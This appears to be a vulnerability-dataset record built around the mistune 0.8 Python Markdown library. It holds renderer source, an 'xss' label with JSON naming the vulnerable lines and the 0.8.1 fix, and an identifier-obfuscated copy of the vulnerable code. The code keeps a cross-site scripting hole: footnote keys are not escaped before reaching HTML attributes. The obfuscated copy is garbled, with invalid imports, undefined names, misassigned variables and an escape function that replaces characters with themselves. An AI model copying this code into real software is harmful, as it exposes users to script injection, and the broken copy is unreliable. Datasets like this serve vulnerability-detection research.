self.footnotes = footnotes or {}
def output(self, text, rules=None):
text = text.rstrip('\n')
if not rules:
rules = list(self.default_rules)
if self._in_footnote and 'footnote' in rules:
rules.remove('footnote')
output = self.renderer.placeholder()
def manipulate(text):
for key in rules:
pattern = getattr(self.rules, key)
m = pattern.match(text)
if not m:
continue
self.line_match = m
out = getattr(self, 'output_%s' % key)(m)
if out is not None:
return m, out
return False # pragma: no cover
while text:
ret = manipulate(text)
if ret is not False:
m, out = ret
output += out
text = text[len(m.group(0)):]
continue
if text: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % text)
return output
def output_escape(self, m):
text = m.group(1)
return self.renderer.escape(text)
def output_autolink(self, m):
link = m.group(1)
if m.group(2) == '@':
is_email = True
else:
is_email = False
return self.renderer.autolink(link, is_email)
def output_url(self, m):
link = m.group(1)
if self._in_link:
return self.renderer.text(link)
return self.renderer.autolink(link, False)
def output_inline_html(self, m):
tag = m.group(1)
if self._parse_inline_html and tag in _inline_tags:
text = m.group(3)
if tag == 'a':
self._in_link = True
text = self.output(text, rules=self.inline_html_rules)
self._in_link = False
else:
text = self.output(text, rules=self.inline_html_rules)
extra = m.group(2) or ''
html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
else:
html = m.group(0)
return self.renderer.inline_html(html)
def output_footnote(self, m):
key = _keyify(m.group(1))
if key not in self.footnotes:
return None
if self.footnotes[key]:
return None
self.footnote_index += 1
self.footnotes[key] = self.footnote_index
return self.renderer.footnote_ref(key, self.footnote_index)
def output_link(self, m):
return self._process_link(m, m.group(3), m.group(4))
def output_reflink(self, m):
key = _keyify(m.group(2) or m.group(1))
if key not in self.links:
return None
ret = self.links[key]
return self._process_link(m, ret['link'], ret['title'])
def output_nolink(self, m):
key = _keyify(m.group(1))
if key not in self.links:
return None
ret = self.links[key]
return self._process_link(m, ret['link'], ret['title'])
def _process_link(self, m, link, title=None):
line = m.group(0)
text = m.group(1)
if line[0] == '!':
return self.renderer.image(link, title, text)
self._in_link = True
text = self.output(text)
self._in_link = False
return self.renderer.link(link, title, text)
def output_double_emphasis(self, m):
text = m.group(2) or m.group(1)
text = self.output(text)
return self.renderer.double_emphasis(text)
def output_emphasis(self, m):
text = m.group(2) or m.group(1)
text = self.output(text)
return self.renderer.emphasis(text)
def output_code(self, m):
text = m.group(2)
return self.renderer.codespan(text)
def output_linebreak(self, m):
return self.renderer.linebreak()
def output_strikethrough(self, m):
text = self.output(m.group(1))
return self.renderer.strikethrough(text)
def output_text(self, m):
text = m.group(0)
return self.renderer.text(text)
class Renderer(object):
"""The default HTML renderer for rendering Markdown.
"""
def __init__(self, **kwargs):
self.options = kwargs
def placeholder(self):
"""Returns the default, empty output value for the renderer.
All renderer methods use the '+=' operator to append to this value.
Default is a string so rendering HTML can build up a result string with
the rendered Markdown.
Can be overridden by Renderer subclasses to be types like an empty
list, allowing the renderer to create a tree-like structure to
represent the document (which can then be reprocessed later into a
separate format like docx or pdf).
"""
return ''
def block_code(self, code, lang=None):
"""Rendering block level code. ``pre > code``.
:param code: text content of the code block.
:param lang: language of the given code.
"""
code = code.rstrip('\n')
if not lang:
code = escape(code, smart_amp=False)
return '<pre><code>%s\n</code></pre>\n' % code
code = escape(code, quote=True, smart_amp=False)
return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (lang, code)
def block_quote(self, text):
"""Rendering <blockquote> with the given text.
:param text: text content of the blockquote.
"""
return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')
def block_html(self, html):
"""Rendering block level pure html content.
:param html: text content of the html snippet.
"""
if self.options.get('skip_style') and \
html.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return escape(html)
return html
def header(self, text, level, raw=None):
"""Rendering header/heading tags like ``<h1>`` ``<h2>``.
:param text: rendered text content for the header.
:param level: a number for the header level, for example: 1.
:param raw: raw text content of the header.
"""
return '<h%d>%s</h%d>\n' % (level, text, level)
def hrule(self):
"""Rendering method for ``<hr>`` tag."""
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def list(self, body, ordered=True):
"""Rendering list tags like ``<ul>`` and ``<ol>``.
:param body: body contents of the list.
:param ordered: whether this list is ordered or not.
"""
tag = 'ul'
if ordered:
tag = 'ol'
return '<%s>\n%s</%s>\n' % (tag, body, tag)
def list_item(self, text):
"""Rendering list item snippet. Like ``<li>``."""
return '<li>%s</li>\n' % text
def paragraph(self, text):
"""Rendering paragraph tags. Like ``<p>``."""
return '<p>%s</p>\n' % text.strip(' ')
def table(self, header, body):
"""Rendering table element. Wrap header and body in it.
:param header: header part of the table.
:param body: body part of the table.
"""
return (
'<table>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</table>\n'
) % (header, body)
def table_row(self, content):
"""Rendering a table row. Like ``<tr>``.
:param content: content of current table row.
"""
return '<tr>\n%s</tr>\n' % content
def table_cell(self, content, **flags):
"""Rendering a table cell. Like ``<th>`` ``<td>``.
:param content: content of current table cell.
:param header: whether this is header or not.
:param align: align of current table cell.
"""
if flags['header']:
tag = 'th'
else:
tag = 'td'
align = flags['align']
if not align:
return '<%s>%s</%s>\n' % (tag, content, tag)
return '<%s style="text-align:%s">%s</%s>\n' % (
tag, align, content, tag
)
def double_emphasis(self, text):
"""Rendering **strong** text.
:param text: text content for emphasis.
"""
return '<strong>%s</strong>' % text
def emphasis(self, text):
"""Rendering *emphasis* text.
:param text: text content for emphasis.
"""
return '<em>%s</em>' % text
def codespan(self, text):
"""Rendering inline `code` text.
:param text: text content for inline code.
"""
text = escape(text.rstrip(), smart_amp=False)
return '<code>%s</code>' % text
def linebreak(self):
"""Rendering line break like ``<br>``."""
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def strikethrough(self, text):
"""Rendering ~~strikethrough~~ text.
:param text: text content for strikethrough.
"""
return '<del>%s</del>' % text
def text(self, text):
"""Rendering unformatted text.
:param text: text content.
"""
if self.options.get('parse_block_html'):
return text
return escape(text)
def escape(self, text):
"""Rendering escape sequence.
:param text: text content.
"""
return escape(text)
def autolink(self, link, is_email=False):
"""Rendering a given link or email address.
:param link: link content or email address.
:param is_email: whether this is an email or not.
"""
text = link = escape_link(link)
if is_email:
link = 'mailto:%s' % link
return '<a href="%s">%s</a>' % (link, text)
def link(self, link, title, text):
"""Rendering a given link with content and title.
:param link: href link for ``<a>`` tag.
:param title: title content for `title` attribute.
:param text: text content for description.
"""
link = escape_link(link)
if not title:
return '<a href="%s">%s</a>' % (link, text)
title = escape(title, quote=True)
return '<a href="%s" title="%s">%s</a>' % (link, title, text)
def image(self, src, title, text):
"""Rendering a image with title and text.
:param src: source link of the image.
:param title: title text of the image.
:param text: alt text of the image.
"""
src = escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
html = '<img src="%s" alt="%s" title="%s"' % (src, text, title)
else:
html = '<img src="%s" alt="%s"' % (src, text)
if self.options.get('use_xhtml'):
return '%s />' % html
return '%s>' % html
def inline_html(self, html):
"""Rendering span level pure html content.
:param html: text content of the html snippet.
"""
if self.options.get('escape'):
return escape(html)
return html
def newline(self):
"""Rendering newline element."""
return ''
def footnote_ref(self, key, index):
"""Rendering the ref anchor of a footnote.
:param key: identity key for the footnote.
:param index: the index count of current footnote.
"""
html = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (escape(key), escape(key), index)
return html
def footnote_item(self, key, text):
"""Rendering a footnote item.
:param key: identity key for the footnote.
:param text: text content of the footnote.
"""
back = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % escape(key)
text = text.rstrip()
if text.endswith('</p>'):
text = re.sub(r'<\/p>$', r'%s</p>' % back, text)
else:
text = '%s<p>%s</p>' % (text, back)
html = '<li id="fn-%s">%s</li>\n' % (escape(key), text)
return html
def footnotes(self, text):
"""Wrapper for all footnotes.
:param text: contents of all footnotes.
"""
html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return html % (self.hrule(), text)
class Markdown(object):
"""The Markdown parser.
:param renderer: An instance of ``Renderer``.
:param inline: An inline lexer class or instance.
:param block: A block lexer class or instance.
"""
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
self.renderer = renderer
if inline and inspect.isclass(inline):
inline = inline(renderer, **kwargs)
if block and inspect.isclass(block):
block = block(**kwargs)
if inline:
self.inline = inline
else:
self.inline = InlineLexer(renderer, **kwargs)
self.block = block or BlockLexer(BlockGrammar())
self.footnotes = []
self.tokens = []
# detect if it should parse text in block html
self._parse_block_html = kwargs.get('parse_block_html')
def __call__(self, text):
return self.parse(text)
def render(self, text):
"""Render the Markdown text.
:param text: markdown formatted text content.
"""
return self.parse(text)
def parse(self, text):
out = self.output(preprocessing(text))
keys = self.block.def_footnotes
# reset block
self.block.def_links = {}
self.block.def_footnotes = {}
# reset inline
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return out
footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
self.footnotes = sorted(
footnotes, key=lambda o: keys.get(o['key']), reverse=True
)
body = self.renderer.placeholder()
while self.footnotes:
note = self.footnotes.pop()
body += self.renderer.footnote_item(
note['key'], note['text']
)
out += self.renderer.footnotes(body)
return out
def pop(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def peek(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def output(self, text, rules=None):
self.tokens = self.block(text, rules)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
out = self.renderer.placeholder()
while self.pop():
out += self.tok()
return out
def tok(self):
t = self.token['type']
# sepcial cases
if t.endswith('_start'):
t = t[:-6]
return getattr(self, 'output_%s' % t)()
def tok_text(self):
text = self.token['text']
while self.peek()['type'] == 'text':
text += '\n' + self.pop()['text']
return self.inline(text)
def output_newline(self):
return self.renderer.newline()
def output_hrule(self):
return self.renderer.hrule()
def output_heading(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def output_code(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def output_table(self):
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body)
def output_block_quote(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
body += self.tok()
return self.renderer.block_quote(body)
def output_list(self):
ordered = self.token['ordered']
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
body += self.tok()
return self.renderer.list(body, ordered)
def output_list_item(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
body += self.tok_text()
else:
body += self.tok()
return self.renderer.list_item(body)
def output_loose_item(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
body += self.tok()
return self.renderer.list_item(body)
def output_footnote(self):
self.inline._in_footnote = True
body = self.renderer.placeholder()
key = self.token['key']
while self.pop()['type'] != 'footnote_end':
body += self.tok()
self.footnotes.append({'key': key, 'text': body})
self.inline._in_footnote = False
return self.renderer.placeholder()
def output_close_html(self):
text = self.token['text']
return self.renderer.block_html(text)
def output_open_html(self):
text = self.token['text']
tag = self.token['tag']
if self._parse_block_html and tag not in _pre_tags:
text = self.inline(text, rules=self.inline.inline_html_rules)
extra = self.token.get('extra') or ''
html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
return self.renderer.block_html(html)
def output_paragraph(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def output_text(self):
return self.renderer.paragraph(self.tok_text())
def markdown(text, escape=True, **kwargs):
"""Render markdown formatted text to html.
:param text: markdown formatted text content.
:param escape: if set to False, all html tags will not be escaped.
:param use_xhtml: output with xhtml tags.
:param hard_wrap: if set to True, it will use the GFM line breaks feature.
:param parse_block_html: parse text only in block level html.
:param parse_inline_html: parse text only in inline level html.
"""
return Markdown(escape=escape, **kwargs)(text)
| xss | {
"code": [
"__version__ = '0.8'",
" return _key_pattern.sub(' ', key.lower())",
" r'<(\\w+%s)((?:%s)*?)\\s*>([\\s\\S]*?)<\\/\\1>' % (_valid_end, _valid_attr),"
],
"line_no": [
14,
51,
448
]
} | {
"code": [
"__version__ = '0.8.1'",
" key = escape(key.lower(), quote=True)",
" r'<(\\w+%s)((?:%s)*?)\\s*>([\\s\\S]*?)<\\/\\1>' % (",
" _valid_end, _valid_attr),"
],
"line_no": [
14,
51,
449,
450
]
} |
import re
import .inspect
__version__ = '0.8'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
VAR_0 = re.compile(r'\s+')
VAR_1 = re.compile(r'\W')
VAR_2 = re.compile(r'&(?!#?\w+;)')
VAR_3 = re.compile(r'\r\n|\r')
VAR_4 = re.compile(r'^ *> ?', VAR_71=re.M)
VAR_5 = re.compile(r'^ {4}', re.M)
VAR_6 = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
VAR_7 = ['pre', 'script', 'style']
VAR_8 = r'(?!:/|[^\w\s@]*@)\b'
VAR_9 = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
VAR_10 = r'(?!(?:%s)\b)\w+%s' % ('|'.join(VAR_6), VAR_8)
VAR_11 = ('javascript:', 'vbscript:')
def FUNC_0(VAR_12):
VAR_21 = VAR_12.pattern
if VAR_21.startswith('^'):
VAR_21 = pattern[1:]
return VAR_21
def FUNC_1(VAR_13):
return VAR_0.sub(' ', VAR_13.lower())
def VAR_19(VAR_14, VAR_15=False, VAR_16=True):
if VAR_16:
VAR_14 = VAR_2.sub('&', VAR_14)
else:
VAR_14 = VAR_14.replace('&', '&')
VAR_14 = VAR_14.replace('<', '<')
VAR_14 = VAR_14.replace('>', '>')
if VAR_15:
VAR_14 = VAR_14.replace('"', '"')
VAR_14 = VAR_14.replace("'", ''')
return VAR_14
def FUNC_3(VAR_17):
VAR_22 = VAR_17.lower().strip('\x00\x1a \n\r\t')
for scheme in VAR_11:
if re.sub(r'[^A-Za-z0-9\/:]+', '', VAR_22).startswith(scheme):
return ''
return VAR_19(VAR_17, VAR_15=True, VAR_16=False)
def FUNC_4(VAR_14, VAR_18=4):
VAR_14 = VAR_3.sub('\n', VAR_14)
VAR_14 = VAR_14.expandtabs(VAR_18)
VAR_14 = VAR_14.replace('\u2424', '\n')
VAR_21 = re.compile(r'^ +$', re.M)
return VAR_21.sub('', VAR_14)
class CLASS_0(object):
VAR_23 = re.compile(
r'^ *\[([^^\]]+)\]: *' # [VAR_13]:
r'<?([^\s>]+)>?' # <VAR_49> or VAR_49
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
VAR_24 = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^VAR_13]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
VAR_25 = re.compile(r'^\n+')
VAR_26 = re.compile(r'^( {4}[^\n]+\n*)+')
VAR_27 = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```VAR_63
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
VAR_28 = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
VAR_29 = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
VAR_30 = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
VAR_31 = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
VAR_32 = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # VAR_28
r'|\n+(?=%s)' # def VAR_60
r'|\n+(?=%s)' # def VAR_61
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
FUNC_0(VAR_23),
FUNC_0(VAR_24),
)
)
VAR_33 = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
VAR_71=re.M
)
VAR_34 = re.compile(r'^ *(?:[*+-]|\d+\.) +')
VAR_35 = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
FUNC_0(VAR_27).replace(r'\1', r'\2'),
FUNC_0(VAR_32).replace(r'\1', r'\3'),
FUNC_0(VAR_28),
FUNC_0(VAR_29),
FUNC_0(VAR_30),
FUNC_0(VAR_31),
FUNC_0(VAR_23),
FUNC_0(VAR_24),
'<' + VAR_10,
)
)
VAR_36 = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (VAR_10, VAR_9),
r'<%s(?:%s)*?\s*\/?>' % (VAR_10, VAR_9),
)
)
VAR_37 = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
VAR_38 = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
VAR_14 = re.compile(r'^[^\n]+')
class CLASS_1(object):
VAR_39 = CLASS_0
VAR_40 = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
VAR_41 = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
VAR_42 = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, VAR_43=None, **VAR_20):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not VAR_43:
rules = self.grammar_class()
self.rules = VAR_43
def __call__(self, VAR_14, VAR_43=None):
return self.parse(VAR_14, VAR_43)
def FUNC_6(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = self.default_rules
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_104 = getattr(self.rules, VAR_13)
VAR_44 = VAR_104.match(VAR_14)
if not VAR_44:
continue
getattr(self, 'parse_%s' % VAR_13)(VAR_44)
return VAR_44
return False # pragma: no cover
while VAR_14:
VAR_44 = FUNC_84(VAR_14)
if VAR_44 is not False:
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return self.tokens
def FUNC_7(self, VAR_44):
VAR_77 = len(VAR_44.group(0))
if VAR_77 > 1:
self.tokens.append({'type': 'newline'})
def FUNC_8(self, VAR_44):
VAR_54 = VAR_5.sub('', VAR_44.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': VAR_54,
})
def FUNC_9(self, VAR_44):
self.tokens.append({
'type': 'code',
'lang': VAR_44.group(2),
'text': VAR_44.group(3),
})
def FUNC_10(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': len(VAR_44.group(1)),
'text': VAR_44.group(2),
})
def FUNC_11(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': 1 if VAR_44.group(2) == '=' else 2,
'text': VAR_44.group(1),
})
def FUNC_12(self, VAR_44):
self.tokens.append({'type': 'hrule'})
def FUNC_13(self, VAR_44):
VAR_46 = VAR_44.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in VAR_46,
})
VAR_45 = VAR_44.group(0)
self._process_list_item(VAR_45, VAR_46)
self.tokens.append({'type': 'list_end'})
def FUNC_14(self, VAR_45, VAR_46):
VAR_45 = self.rules.list_item.findall(VAR_45)
VAR_78 = False
VAR_77 = len(VAR_45)
for VAR_101 in range(VAR_77):
VAR_79 = VAR_45[VAR_101][0]
VAR_94 = len(VAR_79)
VAR_79 = self.rules.list_bullet.sub('', VAR_79)
if '\n ' in VAR_79:
VAR_94 = VAR_94 - len(VAR_79)
VAR_21 = re.compile(r'^ {1,%d}' % VAR_94, VAR_71=re.M)
VAR_79 = VAR_21.sub('', VAR_79)
VAR_95 = VAR_78
if not VAR_95 and re.search(r'\n\n(?!\s*$)', VAR_79):
VAR_95 = True
VAR_96 = len(VAR_79)
if VAR_101 != VAR_77 - 1 and VAR_96:
VAR_78 = VAR_79[VAR_96-1] == '\n'
if not VAR_95:
VAR_95 = VAR_78
if VAR_95:
VAR_89 = 'loose_item_start'
else:
VAR_89 = 'list_item_start'
self.tokens.append({'type': VAR_89})
self.parse(VAR_79, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def FUNC_15(self, VAR_44):
self.tokens.append({'type': 'block_quote_start'})
VAR_45 = VAR_4.sub('', VAR_44.group(0))
self.parse(VAR_45)
self.tokens.append({'type': 'block_quote_end'})
def FUNC_16(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
self.def_links[VAR_13] = {
'link': VAR_44.group(2),
'title': VAR_44.group(3),
}
def FUNC_17(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 in self.def_footnotes:
return
self.def_footnotes[VAR_13] = 0
self.tokens.append({
'type': 'footnote_start',
'key': VAR_13,
})
VAR_14 = VAR_44.group(2)
if '\n' in VAR_14:
VAR_97 = VAR_14.split('\n')
VAR_98 = None
for VAR_85 in VAR_97[1:]:
VAR_94 = len(VAR_85) - len(VAR_85.lstrip())
if VAR_94 and (not VAR_98 or VAR_94 < VAR_98):
VAR_98 = VAR_94
VAR_99 = [VAR_97[0]]
for VAR_85 in VAR_97[1:]:
VAR_99.append(VAR_85[VAR_98:])
VAR_14 = '\n'.join(VAR_99)
self.parse(VAR_14, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': VAR_13,
})
def FUNC_18(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'(?: *\| *)?\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
VAR_100 = re.sub(r'^ *\| *| *\| *$', '', VAR_100)
VAR_80[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_19(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
cells[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_20(self, VAR_44):
VAR_69 = re.sub(r'^ *| *\| *$', '', VAR_44.group(1))
VAR_69 = re.split(r' *\| *', VAR_69)
VAR_81 = re.sub(r' *|\| *$', '', VAR_44.group(2))
VAR_81 = re.split(r' *\| *', VAR_81)
for VAR_101, VAR_100 in enumerate(VAR_81):
if re.search(r'^ *-+: *$', VAR_100):
VAR_81[VAR_101] = 'right'
elif re.search(r'^ *:-+: *$', VAR_100):
VAR_81[VAR_101] = 'center'
elif re.search(r'^ *:-+ *$', VAR_100):
VAR_81[VAR_101] = 'left'
else:
VAR_81[VAR_101] = None
VAR_79 = {
'type': 'table',
'header': VAR_69,
'align': VAR_81,
}
return VAR_79
def FUNC_21(self, VAR_44):
VAR_82 = VAR_44.group(1)
if not VAR_82:
VAR_14 = VAR_44.group(0)
self.tokens.append({
'type': 'close_html',
'text': VAR_14
})
else:
VAR_102 = VAR_44.group(2)
VAR_14 = VAR_44.group(3)
self.tokens.append({
'type': 'open_html',
'tag': VAR_82,
'extra': VAR_102,
'text': VAR_14
})
def FUNC_22(self, VAR_44):
VAR_14 = VAR_44.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': VAR_14})
def FUNC_23(self, VAR_44):
VAR_14 = VAR_44.group(0)
self.tokens.append({'type': 'text', 'text': VAR_14})
class CLASS_2(object):
VAR_19 = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
VAR_47 = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (VAR_8, VAR_9),
r'<\w+%s(?:%s)*?\s*\/?>' % (VAR_8, VAR_9),
)
)
VAR_48 = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
VAR_49 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
VAR_50 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
VAR_51 = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
VAR_17 = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
VAR_52 = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
VAR_53 = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
VAR_54 = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `VAR_54`
VAR_55 = re.compile(r'^ {2,}\n(?!\s*$)')
VAR_56 = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
VAR_57 = re.compile(r'^\[\^([^\]]+)\]')
VAR_14 = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def FUNC_24(self):
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class CLASS_3(object):
VAR_39 = CLASS_2
VAR_40 = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
VAR_58 = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, VAR_59, VAR_43=None, **VAR_20):
self.renderer = VAR_59
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not VAR_43:
rules = self.grammar_class()
VAR_20.update(self.renderer.options)
if VAR_20.get('hard_wrap'):
VAR_43.hard_wrap()
self.rules = VAR_43
self._in_link = False
self._in_footnote = False
self._parse_inline_html = VAR_20.get('parse_inline_html')
def __call__(self, VAR_14, VAR_43=None):
return self.output(VAR_14, VAR_43)
def FUNC_25(self, VAR_60, VAR_61):
self.footnote_index = 0
self.links = VAR_60 or {}
self.footnotes = VAR_61 or {}
def VAR_83(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = FUNC_48(self.default_rules)
if self._in_footnote and 'footnote' in VAR_43:
rules.remove('footnote')
VAR_83 = self.renderer.placeholder()
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_21 = getattr(self.rules, VAR_13)
VAR_44 = VAR_21.match(VAR_14)
if not VAR_44:
continue
self.line_match = VAR_44
VAR_87 = getattr(self, 'output_%s' % VAR_13)(VAR_44)
if VAR_87 is not None:
return VAR_44, VAR_87
return False # pragma: no cover
while VAR_14:
VAR_84 = FUNC_84(VAR_14)
if VAR_84 is not False:
VAR_44, VAR_87 = VAR_84
VAR_83 += VAR_87
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return VAR_83
def FUNC_27(self, VAR_44):
VAR_14 = VAR_44.group(1)
return self.renderer.escape(VAR_14)
def FUNC_28(self, VAR_44):
VAR_49 = VAR_44.group(1)
if VAR_44.group(2) == '@':
VAR_72 = True
else:
VAR_72 = False
return self.renderer.autolink(VAR_49, VAR_72)
def FUNC_29(self, VAR_44):
VAR_49 = VAR_44.group(1)
if self._in_link:
return self.renderer.text(VAR_49)
return self.renderer.autolink(VAR_49, False)
def FUNC_30(self, VAR_44):
VAR_82 = VAR_44.group(1)
if self._parse_inline_html and VAR_82 in VAR_6:
VAR_14 = VAR_44.group(3)
if VAR_82 == 'a':
self._in_link = True
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
self._in_link = False
else:
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
VAR_93 = VAR_44.group(2) or ''
